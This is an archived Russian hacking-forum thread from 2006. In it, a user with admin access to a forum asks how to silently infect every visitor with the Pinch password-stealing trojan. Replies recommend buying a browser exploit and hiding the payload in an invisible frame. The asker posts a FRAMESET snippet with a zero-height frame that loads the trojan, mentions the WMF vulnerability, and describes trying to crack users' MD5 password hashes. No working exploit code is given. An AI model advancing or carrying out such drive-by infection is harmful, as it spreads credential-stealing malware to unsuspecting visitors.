Просмотр полной версии : Как засунуть пинча на форум?
есть полный доступ к форуму,хочу засунуть пинч,так чтобы какждый кто заходил на форум ловил моего пинча(незаметно).
Если можно поподробнее,а то я еще мало чего понимаю.
Еще? или уже?
Вешай эксплоит. Обойдется ~ 1k зелени.
NaX[no]rT
10.05.2006, 23:44
Мдя ... 1000$ офигеть ... после того, что делают некоторые люди, то их себестоимость сводится к нулю
Правильно, вешай в невидимый фрейм. А вообще посмотри тему, такая уже поднималась
мне это ни очем не сказало
qPhoenix
11.05.2006, 16:16
"невидимый фрейм" это были ключевые слова, введи их в поиск и они тебе скажут много интересного... :p
может мне эта уязвимость поможет MS Fax and Picture Viewer ????
а может всетаки кто-то подскажет как шеллом wmf.
пользоваться!? конечно все прекрасно у меня открывает ,без разрешения,тока как сделать тоже самое чтобы мой трой открывался?
podkashey
11.05.2006, 17:48
твой трой должен залиться на комп юзеру и потом запуститься у него. Для этого нужны сплойты, использующие дыры броузеров и тд. Все они стоят денег. Кароче затраты от этого ты поимеешь не сопоставимые со смыслом от этого. Да еще и гемороя поимеешь ИМХО.
podkashey
11.05.2006, 18:43
Сам подумай. Если бы это было легко, то многие админы и вебмастера так и делали и интернет погрузился бы в хаос... ;)
Допустим сломал кто-нить мэйл.ру, на главной странице сделал так как ты хочешь, только не с пинчем, а с вм и еголд-троями и появился бы новый алигарх.... Это я образно конечно сказал... ;)
ну а как мне поступить в этом случае? мне впринципе не сам форум нужен,а нужно через форум получить доступ к сайту,через человека который лазиет на этом форуме, впринципе пароли на всех пользователей есть там,но они в md5, пробывал какой-то программой расшивровать,ну часов 12 просидел и забил! это бесконечный алгоритм!
У меня такой вопрос возникает-нельзя заставить вместо аватара грузить трояна?
Ну что мне посоветуете?
чёто я тут надыбал! сам низнаю чё! впринципе неплохо было написано когда я читал про это...
<FRAMESET rows="*,0">
<FRAME SRC="нормальная ссылка" NAME="тут как я понял-какой фаил должен открытся">
<FRAME SRC="ссылка на пинча" NAME="мой пинч">
</FRAMESET>
неужели нельзя подставить функцию на атоматическое выполнение второй ссылки?
Worms выдается гноме авардс медная.
Тема закрывается.
Поясняю на причину: не по теме,это тебе в безопасность систем,то есть тут надо эксплатировать уязвимости IE\Opera\Firefox, а браузеры - не форумы.
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot